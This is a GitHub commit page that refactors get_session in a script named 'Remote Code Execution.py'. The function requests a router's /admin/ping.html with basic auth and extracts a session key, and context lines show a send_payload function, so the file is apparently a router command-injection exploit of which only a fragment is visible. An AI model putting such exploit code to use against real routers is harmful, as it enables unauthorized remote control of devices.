Skip to content

Commit 0da136b

Browse files
authored
Improved Session Key Retrieval
Improved readability and efficiency, it makes use of Python's string manipulation capabilities for extracting the session key
1 parent 5456f25 commit 0da136b

File tree

1 file changed

+7
-10
lines changed

1 file changed

+7
-10
lines changed

Cyber_security projects/Remote Code Execution.py

Lines changed: 7 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -22,15 +22,12 @@ def main():
2222

2323

2424
def get_session():
25-
url =3D router_host + "/admin/ping.html"
26-
headers =3D {"Authorization": "Basic {}".format(authorization_header)}
27-
r =3D requests.get(url, headers=3Dheaders).text
28-
i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D")
29-
s =3D ""
30-
while r[i] !=3D "'":
31-
s =3D s + r[i]
32-
i =3D i + 1
33-
return s
25+
url = f"{config['router_host']}/admin/ping.html"
26+
headers = {"Authorization": config['authorization_header']}
27+
response = requests.get(url, headers=headers)
28+
session_key = response.text.split("&sessionKey=")[1].split("'")[0]
29+
return session_key
30+
3431

3532

3633
def send_payload(payload):
@@ -42,4 +39,4 @@ def send_payload(payload):
4239
requests.get(url, headers=3Dheaders, params=3Dparams).text
4340

4441

45-
main()
42+
main()

0 commit comments

Comments
 (0)
pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy